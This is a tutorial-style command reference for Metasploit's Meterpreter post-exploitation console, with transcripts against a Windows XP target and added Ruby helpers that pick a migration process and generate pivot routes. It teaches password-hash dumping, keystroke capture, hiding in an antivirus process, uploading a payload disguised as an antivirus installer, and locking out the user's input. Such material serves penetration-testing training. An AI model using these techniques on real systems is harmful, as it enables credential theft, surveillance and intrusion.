Metasploit/MeterpreterClient


=Introduction=

Meterpreter is the Metasploit payload that gives us an interactive post-exploitation console on the compromised host. After a successful exploit it runs inside the memory of the exploited process on the target and talks back to the Metasploit console over the connection the exploit established; it is usually injected as a DLL without an executable being written to disk, but it can also be delivered as a standalone executable, as in several of the examples below. Its functionality is split into extensions that are loaded into the running server: stdapi provides the file system, process, network and user-interface commands, and priv adds hashdump and timestomp. The prompt of the Meterpreter console is meterpreter >, and everything we type there is executed on the target unless the command is one of the local (l-prefixed) ones described below.

=Getting Started=

=Commands=

?
We can use ? or help to show a list of commands with brief descriptions.

background
The background command places the current session into the background and returns us to the Metasploit console without terminating the session. The session keeps its connection and can be resumed at any time: sessions -l lists the live sessions and sessions -i <id> brings one back to the foreground.

 meterpreter > background
 msf exploit(handler) > sessions -l
 Active sessions
 ===============
   Id  Description  Tunnel
   --  -----------  ------
   1   Meterpreter  192.168.50.112:443 -> 192.168.50.100:1495
 msf exploit(handler) > sessions -i 1
 [*] Starting interaction with 1...
 meterpreter >

channel
Displays information about active channels. A channel is a stream between the console and something on the target, such as a process started with execute -c or a shell started with shell; channel -l lists them, channel -i <id> interacts with one, and channel -c <id> closes it.

close
Closes a channel: close <id>. The process behind the channel is not necessarily terminated, use kill for that.

exit
Closes the active session and returns us to the Metasploit console. Unlike background, the connection to the target is torn down and the session cannot be resumed; quit is an alias.

 meterpreter > exit
 [*] Meterpreter session 1 closed.
 msf exploit(handler) > sessions -l
 Active sessions
 ===============
 No active sessions.

help
We can use ? or help to show a list of commands with brief descriptions.

interact
Interacts with a channel: interact <id> attaches our console to the channel so that what we type is sent to it and its output is printed back to us. It is the same as channel -i <id>.

irb
We can start an Interactive Ruby Shell with the irb command, allowing us to use Ruby to drive the compromised system through the same API that Meterpreter's own commands and scripts use. The client variable holds the Meterpreter client object, so anything a command does can be done programmatically (for example client.sys.config.sysinfo below does what the sysinfo command does). Whatever we do here happens on the target, not on our machine.

To view the API, we run the rdoc command from the Metasploit directory, which creates a doc/index.html file that we can open in a browser; the Rex::Post::Meterpreter section is the relevant part.

 meterpreter > irb
 [*] Starting IRB shell
 [*] The 'client' variable holds the meterpreter client
 >> client.sys.config.sysinfo
 => {"OS"=>"Windows XP (Build 2600, Service Pack 2).", "Computer"=>"TARGETLAPTOP"}

migrate
Meterpreter initially runs inside the exploited process, or inside its own process when it was delivered as a standalone executable. If that process exits for any reason (the user closes the application, a service is restarted, the exploited program crashes) the Meterpreter session closes with it, so it is good practice to migrate the session into a more stable process as early as possible. Windows' explorer.exe is a common choice because it lives as long as the user's desktop session. Two caveats: migrate needs the right to open the destination process, so as an unprivileged user we can only move into processes running as that same user, while SYSTEM can move into almost anything; and the destination should be something expected to survive, not a transient process such as an updater.

The following example uses a handful of commands to locate a process that the user is unlikely to close during the session. Rather than explorer.exe, the example picks the McAfee agent, mcagent.exe. The commands are:

 * 1) ps - Show a list of running processes.
 * 2) getpid - Display the process Meterpreter is currently running in, which here is the EXE payload meter-443.exe.
 * 3) migrate pid - Move Meterpreter into the process with the given PID, here the McAfee agent.
 * 4) getpid - Display the new process Meterpreter is running in, confirming it is the McAfee agent.

Compare the two listings: after the migration meter-443.exe (PID 1692) is gone, since the payload executable had nothing left to do once Meterpreter moved out of it, and a taskmgr.exe has appeared, a reminder that the user may be active on the machine.

 meterpreter > ps
 Process list
 ============
    PID   Name                      Path
    ---   ----                      ----
    220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe
    292   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
    484   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    492   smss.exe                  \SystemRoot\System32\smss.exe
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
    636   services.exe              C:\WINDOWS\system32\services.exe
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe
    956   svchost.exe               C:\WINDOWS\System32\svchost.exe
    1404  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe
    1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE
    1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
    1616  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe
    1692  meter-443.exe             C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe
    1848  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    1860  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    1884  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
    1996  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
    3320  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe
    3424  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
    4032  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
 meterpreter > getpid
 Current pid: 1692
 meterpreter > migrate 1536
 [*] Migrating to 1536...
 [*] Migration completed successfully.
 meterpreter > ps
 Process list
 ============
    PID   Name                      Path
    ---   ----                      ----
    220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe
    292   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
    484   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    492   smss.exe                  \SystemRoot\System32\smss.exe
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
    636   services.exe              C:\WINDOWS\system32\services.exe
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
    744   taskmgr.exe               C:\WINDOWS\system32\taskmgr.exe
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe
    956   svchost.exe               C:\WINDOWS\System32\svchost.exe
    1404  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe
    1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE
    1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
    1616  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe
    1848  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    1860  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    1884  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
    1996  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
    3320  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe
    3424  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
    4032  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
 meterpreter > getpid
 Current pid: 1536
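Choosing the migration target by hand from a long ps listing is error-prone, and the irb section above shows that the same information is available to Ruby. The following is an added example, not code from the Metasploit project or from this page's author: it parses the text of a ps listing (a constructed, abbreviated copy of the output above) into hashes, then picks a destination process from a preference list while refusing to pick Meterpreter's own process or known short-lived ones. The hash keys pid, name and path are assumed to match what client.sys.process.get_processes returns in a live session, so the selection function can be reused there unchanged.

```ruby
# Added example (not part of Metasploit): pick a process to migrate into.
# Parses the text of `ps` so it runs offline; in a live irb session you
# would feed choose_migration_target the result of
# client.sys.process.get_processes instead (assumed to use the same keys).

# Constructed sample: an abbreviated copy of the ps listing shown above.
SAMPLE_PS = <<~'PS'
  Process list
  ============
     PID   Name                      Path
     ---   ----                      ----
     492   smss.exe                  \SystemRoot\System32\smss.exe
     592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
     648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
     1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE
     1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
     1692  meter-443.exe             C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe
     3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
PS

# Turn "<pid> <name> <path>" rows into hashes; header and rule lines are skipped
# because they do not start with a number. Paths may contain spaces.
def parse_ps(text)
  text.each_line.filter_map do |line|
    m = line.match(/\A\s*(\d+)\s+(\S+)\s+(.*?)\s*\z/)
    next unless m
    { 'pid' => m[1].to_i, 'name' => m[2], 'path' => m[3] }
  end
end

# Names in descending order of preference. explorer.exe lives as long as the
# user's desktop session; the others are long-lived services. Processes in
# AVOID are transient (Windows Update client) and are never chosen.
PREFERRED = %w[explorer.exe svchost.exe spoolsv.exe].freeze
AVOID     = %w[wuauclt.exe].freeze

# Returns the PID to migrate into, or nil if nothing on the list is running.
def choose_migration_target(procs, own_pid, preferred: PREFERRED, avoid: AVOID)
  candidates = procs.reject do |p|
    p['pid'] == own_pid || avoid.include?(p['name'].downcase)
  end
  preferred.each do |name|
    hit = candidates.find { |p| p['name'].downcase == name }
    return hit['pid'] if hit
  end
  nil
end

procs  = parse_ps(SAMPLE_PS)
target = choose_migration_target(procs, 1692)   # 1692 is meter-443.exe, our own process
puts "migrate #{target}"                        # prints: migrate 1432
# In a live session the final step would be: client.core.migrate(target) if target
```

Case is ignored when matching names because Windows reports Explorer.EXE in mixed case. Passing a different preferred list (for example %w[mcagent.exe]) reproduces the choice made in the transcript above.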

quit
An alias for exit: closes the active session and returns us to the Metasploit console.

 meterpreter > quit
 [*] Meterpreter session 1 closed.
 msf exploit(handler) > sessions -l
 Active sessions
 ===============
 No active sessions.

read
Reads data from a channel: read <id> prints whatever the channel has buffered, for example the output of a process started with execute -c.

run
We can execute a Meterpreter script with the run command. If no path is given, Meterpreter looks for the script in the scripts/meterpreter/ directory of the Metasploit installation. Meterpreter scripts have since been superseded by post modules, which are also started with run (run post/...), but the scripts shipped with the version shown here still work as below.

In the following example we run scripts/meterpreter/scraper.rb, which collects basic information from the target: system information, password hashes and a full export of the registry. The information is logged to the ~/.msf3/logs/scraper directory. Note how noisy this is: each hive is exported to a .reg file in the user's temp directory on the target, downloaded, and then deleted, so a lot of data is written to disk and pulled over the session.

 meterpreter > run scraper.rb
 [*] New session on 192.168.50.100:1548...
 [*] Gathering basic system information...
 [*] Dumping password hashes...
 [*] Obtaining the entire registry...
 [*] Exporting HKCU
 [*] Downloading HKCU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\xHzyoaiW.reg)
 [*] Cleaning HKCU
 [*] Exporting HKLM
 [*] Downloading HKLM (C:\DOCUME~1\Administrator\LOCALS~1\Temp\JYCDjVMU.reg)
 [*] Cleaning HKLM
 [*] Exporting HKCC
 [*] Downloading HKCC (C:\DOCUME~1\Administrator\LOCALS~1\Temp\uEATxCej.reg)
 [*] Cleaning HKCC
 [*] Exporting HKCR
 [*] Downloading HKCR (C:\DOCUME~1\Administrator\LOCALS~1\Temp\guYOZCzT.reg)
 [*] Cleaning HKCR
 [*] Exporting HKU
 [*] Downloading HKU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\ZNfDGqdB.reg)
 [*] Cleaning HKU
 [*] Completed processing on 192.168.50.100:1548...

use
For additional commands and functionality we load Meterpreter extensions with the use command; use -l lists the extensions available to load. In current Metasploit releases the command is called load and use remains as an alias for it.

In the following example we want the hashdump command to retrieve password hashes from the target. The use priv command loads the extension that provides it (and timestomp); we verify this with ?, which now lists the new commands. The relevant part of the help output is shown.

 meterpreter > use -l
 stdapi
 sniffer
 incognito
 priv
 espia
 meterpreter > use priv
 Loading extension priv...success.
 meterpreter > ?
 Priv: Password database Commands
 ================================
     Command       Description
     -------       -----------
     hashdump      Dumps the contents of the SAM database
 Priv: Timestomp Commands
 ========================
     Command       Description
     -------       -----------
     timestomp     Manipulate file MACE attributes

write
Writes data to a channel: write <id> prompts for input and sends it to the channel, for example to feed a command to a process started with execute -c.

cat
The cat command displays the contents of a single file on the target. As of the time of this writing, the command throws an error when trying to read an empty file.

 meterpreter > cat passwords.txt
 harleydavidson
 password
 kidsbirthday

cd
The cd command changes the working directory on the target.

The command accepts back and forward slashes somewhat interchangeably, though in the author's experience forward slashes work more reliably. "." and ".." refer to the current and parent directory respectively, and double quotes are used around path components that contain spaces. The directory reported by pwd afterwards is the name as stored on the target, so its case may differ from what was typed.

 meterpreter > pwd
 C:\
 meterpreter > cd /"Program Files"/"Internet Explorer"
 meterpreter > pwd
 C:\Program Files\Internet Explorer
 meterpreter > cd ../../"documents and settings"/Administrator/Desktop/
 meterpreter > pwd
 C:\Documents and Settings\Administrator\Desktop
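The rules just described (either slash, quoted components for spaces, "." and "..", absolute versus relative arguments) are easy to state but fiddly to get right in a script that builds target paths. The following added example, written for this page and not taken from Metasploit, resolves a cd argument against a current directory exactly as the transcript above behaves. It assumes a Windows target with drive-letter paths; a drive-relative argument such as D:data is treated as absolute, and the result keeps the case that was typed because only the target knows the on-disk name.

```ruby
# Added example (not part of Metasploit): resolve a Meterpreter cd argument
# against the current working directory, following the rules shown above.
def resolve_cd(cwd, arg)
  drive = cwd[/\A[A-Za-z]:/]
  if (m = arg.match(/\A([A-Za-z]:)(.*)\z/m))
    drive, arg = m[1], m[2]       # argument names a drive: start from its root
    absolute = true
  else
    absolute = arg.start_with?('/', '\\')
  end

  # Split on either slash, but keep quoted chunks ("Program Files") whole.
  segs = arg.scan(/"[^"]*"|[^\\\/"]+/).map { |s| s.delete('"') }

  # Relative arguments build on the components of the current directory.
  parts = absolute ? [] : cwd.sub(/\A[A-Za-z]:/, '').split(/[\\\/]/).reject(&:empty?)
  segs.each do |s|
    case s
    when '.'  then next
    when '..' then parts.pop        # popping past the root stays at the root
    else parts << s
    end
  end
  "#{drive}\\#{parts.join('\\')}"
end

puts resolve_cd('C:\\', '/"Program Files"/"Internet Explorer"')
# C:\Program Files\Internet Explorer
puts resolve_cd('C:\Program Files\Internet Explorer', '../../"documents and settings"/Administrator/Desktop/')
# C:\documents and settings\Administrator\Desktop
```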

download
When we need to retrieve a file from the target we use the download command, which copies the specified file into our local working directory (the one shown by lpwd). To download an entire directory tree we use download -r.

 meterpreter > download users.txt
 [*] downloading: users.txt -> users.txt
 [*] downloaded : users.txt -> users.txt

edit
To edit a file on the target with our local text editor we use the edit command. Behind the scenes, Meterpreter downloads a copy of the file to a temporary directory, opens it in the editor, and uploads the new contents when the editor exits, so the file's modification time on the target changes.

 meterpreter > edit users.txt

getlwd
We can show the current working directory on our local machine with getlwd (get local working directory), or with its alias lpwd (local print working directory).

 meterpreter > getlwd
 /home/myusername/Desktop/metasploit
 meterpreter > lpwd
 /home/myusername/Desktop/metasploit

getwd
We can show the current working directory on the exploited machine with getwd (get working directory), or with its alias pwd (print working directory).

 meterpreter > getwd
 C:\Program Files\Internet Explorer
 meterpreter > pwd
 C:\Program Files\Internet Explorer

lcd
To change the local working directory we use the lcd command. This affects where download puts files and where upload looks for them.

The command takes its argument in the same form as your own operating system's cd command, so refer to your system's documentation for specifics. The following example shows lcd on a Linux system.

 meterpreter > lpwd
 /home/myusername/Desktop/metasploit
 meterpreter > lcd ../..
 meterpreter > lpwd
 /home/myusername
 meterpreter > lcd /home/myusername/Desktop/metasploit
 meterpreter > lpwd
 /home/myusername/Desktop/metasploit

lpwd
We can show the current working directory on our local machine with lpwd (local print working directory), or with its alias getlwd (get local working directory).

 meterpreter > lpwd
 /home/myusername/Desktop/metasploit
 meterpreter > getlwd
 /home/myusername/Desktop/metasploit

ls
The ls command shows both the current working directory on the target and a detailed listing of the files in it, in a format similar to the GNU ls program. Treat the Mode and Last modified columns with care on Windows targets: the listing below reports every entry as rwxrwxrwx and gives every entry the Unix epoch (Wed Dec 31 18:00:00 -0600 1969) as its timestamp, which means no usable mode or time was returned, not that the files were created then.

 meterpreter > ls
 Listing: C:\Documents and Settings\Administrator\Desktop\shared
 ===============================================================
 Mode              Size   Type  Last modified                   Name
 ----              ----   ----  -------------                   ----
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..
 100777/rwxrwxrwx  14965  fil   Wed Dec 31 18:00:00 -0600 1969  meter-443.exe
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  u3

mkdir
We use mkdir to create a new directory on the target system.

 meterpreter > mkdir antivirus-update
 Creating directory: antivirus-update
 meterpreter > ls
 Listing: C:\Documents and Settings\Administrator\Desktop
 ========================================================
 Mode              Size   Type  Last modified                   Name
 ----              ----   ----  -------------                   ----
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  antivirus-update
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  shared
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  working

pwd
We can show the current working directory on the target with pwd (print working directory), or with its alias getwd (get working directory). For the directory on our own machine use lpwd instead.

 meterpreter > pwd
 C:\Program Files\Internet Explorer
 meterpreter > getwd
 C:\Program Files\Internet Explorer

rmdir
We can remove an empty directory on the target with the rmdir command. The command throws an error if the directory is not empty.

 meterpreter > rmdir antivirus-update
 Removing directory: antivirus-update

upload
To send a file to the target system we use the upload command; the -r switch uploads a directory and its contents recursively. In the following example we upload a Meterpreter payload that has been renamed to look like an antivirus installer. Remember that upload writes the file to the target's disk, where the installed antivirus (McAfee, judging by the process listings on this page) can scan it; the original in-memory Meterpreter never touched the disk.

 meterpreter > upload antivirus.exe
 [*] uploading : antivirus.exe -> antivirus.exe
 [*] uploaded  : antivirus.exe -> antivirus.exe
 meterpreter > ls
 Listing: C:\Documents and Settings\Administrator\Desktop\antivirus-update
 =========================================================================
 Mode              Size   Type  Last modified                   Name
 ----              ----   ----  -------------                   ----
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .
 40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..
 100777/rwxrwxrwx  10912  fil   Wed Dec 31 18:00:00 -0600 1969  antivirus.exe

ipconfig
The ipconfig command lists all network interfaces on the target with their MAC address, IP address and netmask. Its output is most useful for determining which networks the target is directly connected to, which is what we need to know before pivoting through the session.

For example, from the output below we can see that the target is connected to the 192.168.50.0/24 network with the address 192.168.50.100; the loopback interface tells us nothing about the network and is ignored.

 meterpreter > ipconfig
 MS TCP Loopback interface
 Hardware MAC: 00:00:00:00:00:00
 IP Address : 127.0.0.1
 Netmask    : 255.0.0.0
 
 National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport
 Hardware MAC: 00:0b:cd:30:db:0a
 IP Address : 192.168.50.100
 Netmask    : 255.255.255.0
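Working out the attached networks by eye is fine for one interface, but a multi-homed host is exactly the case where it matters and where a netmask is easy to misread. The following added example, written for this page rather than taken from Metasploit, parses ipconfig output of the form shown above (a constructed copy of it is embedded), converts each address and netmask into a network in CIDR form, skips loopback and rejects a non-contiguous netmask instead of silently computing a wrong network. As a convenience it also emits the corresponding msfconsole route add lines (network, netmask, session id), which is the command used on the Metasploit console, not in Meterpreter, to send traffic for those networks through the session.

```ruby
# Added example (not part of Metasploit): derive the networks a target is
# attached to from Meterpreter's ipconfig output.
require 'ipaddr'

# Constructed sample: the ipconfig output shown above, one field per line.
SAMPLE_IPCONFIG = <<~'TXT'
  MS TCP Loopback interface
  Hardware MAC: 00:00:00:00:00:00
  IP Address : 127.0.0.1
  Netmask    : 255.0.0.0

  National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport
  Hardware MAC: 00:0b:cd:30:db:0a
  IP Address : 192.168.50.100
  Netmask    : 255.255.255.0
TXT

# One hash per interface. A "Hardware MAC:" line opens a block and the line
# just before it is the adapter name.
def parse_ipconfig(text)
  ifaces = []
  prev = ''
  text.each_line(chomp: true) do |line|
    case line
    when /\AHardware MAC:\s*(\S+)/  then ifaces << { 'name' => prev, 'mac' => $1 }
    when /\AIP Address\s*:\s*(\S+)/ then ifaces.last['ip'] = $1
    when /\ANetmask\s*:\s*(\S+)/    then ifaces.last['mask'] = $1
    end
    prev = line
  end
  ifaces
end

# Dotted netmask -> prefix length (255.255.255.0 -> 24). A mask whose one-bits
# are not contiguous has no prefix length and would give a wrong network.
def prefix_length(mask)
  bits = IPAddr.new(mask).to_i
  host = ~bits & 0xFFFFFFFF
  raise ArgumentError, "non-contiguous netmask #{mask}" unless (host & (host + 1)).zero?
  bits.to_s(2).count('1')
end

# Networks the target is directly attached to, ignoring loopback and any
# interface that reported no address or mask.
def attached_networks(text)
  parse_ipconfig(text).filter_map do |i|
    next if i['ip'].nil? || i['mask'].nil?
    addr = IPAddr.new(i['ip'])
    next if IPAddr.new('127.0.0.0/8').include?(addr)
    plen = prefix_length(i['mask'])
    net  = IPAddr.new("#{i['ip']}/#{plen}")   # IPAddr clears the host bits
    { 'net' => net.to_s, 'mask' => i['mask'], 'prefix' => plen }
  end
end

# msfconsole route lines (not Meterpreter's route, which edits the target's
# own table) that send traffic for each network through the given session.
def pivot_routes(text, session_id)
  attached_networks(text).map { |n| "route add #{n['net']} #{n['mask']} #{session_id}" }
end

puts pivot_routes(SAMPLE_IPCONFIG, 1)   # route add 192.168.50.0 255.255.255.0 1
```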

portfwd
Forwards a local port to a service reachable from the target: portfwd add -l <local port> -p <remote port> -r <remote host> makes connections to the local port on our machine travel through the session to the remote host and port, which lets local tools (an RDP client, a browser, a scanner) reach services that only the target can see. portfwd list shows the active forwards and portfwd delete removes one.

route
Views and modifies the routing table of the target itself: route alone prints it, route add <subnet> <netmask> <gateway> and route delete <subnet> <netmask> <gateway> change it. This is not the same as the route command of the Metasploit console, which tells Metasploit to send its own traffic for a subnet through a session.

execute
Executes a program on the target.

The -f switch names the program to run and -a passes its arguments. By default the program runs in the background and the only thing reported back is its process id, which we can confirm with ps. Three further switches change that: -H starts the program hidden so no window appears on the user's desktop, -c gives it a channel so that its input and output can be worked with through the channel, read, write and interact commands, and -i interacts with it immediately.

 meterpreter > execute -f cmd.exe
 Process 54124 created.

getpid
Reports the id of the process Meterpreter is currently running in. Run it again after migrate to confirm the move.

getuid
Reports the user the Meterpreter server is running as. Together with getpid this tells us which token we hold; it should be re-checked after migrate, since the new host process may run as a different user.

kill
Terminates a process on the target: kill <pid>. Killing the process Meterpreter itself runs in ends the session.

ps
The ps command lists the running processes and is important for two reasons. First, it tells us which applications and services are running on the target, which is basic situational awareness (here, for example, VNC, McAfee and an open Notepad). Secondly, it is how we find a suitable process to migrate into, since Meterpreter dies with the process that hosts it (see migrate above).

 meterpreter > ps
 Process list
 ============
    PID   Name                      Path
    ---   ----                      ----
    284   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe
    424   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe
    492   smss.exe                  \SystemRoot\System32\smss.exe
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe
    612   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    636   services.exe              C:\WINDOWS\system32\services.exe
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe
    876   NOTEPAD.EXE               C:\WINDOWS\system32\NOTEPAD.EXE
    964   svchost.exe               C:\WINDOWS\System32\svchost.exe
    1348  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe
    1464  Explorer.EXE              C:\WINDOWS\Explorer.EXE
    1540  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe
    1612  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe
    1840  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    1852  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
    1876  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
    1928  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
    1952  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
    3028  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe
    3168  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe
    3240  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe

reboot
The reboot command restarts the target system. This is disruptive and obvious to anyone using the machine, and it ends our session, so on a real engagement it is only appropriate when the rules of engagement allow it and a way back in (for example a persistent payload) is already in place.

 meterpreter > reboot
 Rebooting...

reg
Modifies and interacts with the registry of the target. The subcommands are enumkey, createkey, deletekey, queryval, setval and deleteval; the key is given with -k, a value name with -v and, for setval, the data with -d (and its type with -t).

rev2self
Calls RevertToSelf on the target, dropping any impersonated token (for example one stolen with the incognito extension) and returning to the token the Meterpreter process started with. Useful when an impersonation has left us with fewer rights than we began with.

shutdown
The shutdown command powers off the target system. Like reboot it is disruptive, visible and terminates our session, so use it only when the engagement permits it.

 meterpreter > shutdown
 Shutting down...

sysinfo
One of the earliest commands we should run after exploitation is sysinfo. It reports the computer name and the OS version, which often hints at the purpose of the target system and tells us which privilege escalation and post-exploitation techniques are worth trying.

 meterpreter > sysinfo
 Computer: TARGETLAPTOP
 OS      : Windows XP (Build 2600, Service Pack 2).

enumdesktops
Lists all window stations and desktops that the Meterpreter process can access. Keystroke capture and screen interaction are tied to the desktop the process is attached to, so this shows what is available to switch to with setdesktop.

idletime
The idletime command reports how long the user of the target system has been idle (no keyboard or mouse input). It is worth checking before doing anything visible on the desktop, such as uictl or setdesktop, and a long idle time is a good moment for noisy actions.

 meterpreter > idletime
 User has been idle for: 51 secs

keyscan_dump
We can capture the keyboard input of the target with the keyscan series of commands. keyscan_start and keyscan_stop begin and end the recording of keystrokes, while keyscan_dump prints everything recorded so far to our console. The sniffer sees only the desktop that Meterpreter's host process is attached to, so to capture what the logged-on user types, migrate into a process on the user's desktop such as explorer.exe first; to capture credentials entered at the logon screen, migrate into winlogon.exe instead.

 meterpreter > keyscan_start
 Starting the keystroke sniffer...
 meterpreter > keyscan_dump
 Dumping captured keystrokes...
 This text is actually being typed into the target's keyboard.
 meterpreter > keyscan_stop
 Stopping the keystroke sniffer...

keyscan_start
Starts the keystroke sniffer on the target. See keyscan_dump above for the full explanation and an example of the start, dump and stop sequence.

keyscan_stop
Stops the keystroke sniffer on the target. See keyscan_dump above for the full explanation and an example of the start, dump and stop sequence.

setdesktop
Moves Meterpreter to a different window station and desktop, chosen from those listed by enumdesktops. This changes which desktop the keyscan commands and screen-related functions operate on.

uictl
The uictl command lets us disable and re-enable keyboard and mouse input on the target: uictl disable|enable keyboard|mouse|all. A user at the keyboard will notice immediately, so remember to enable input again when done.

 meterpreter > uictl disable mouse
 Disabling mouse...
 meterpreter > uictl enable mouse
 Enabling mouse...
 meterpreter > uictl disable keyboard
 Disabling keyboard...
 meterpreter > uictl enable keyboard
 Enabling keyboard...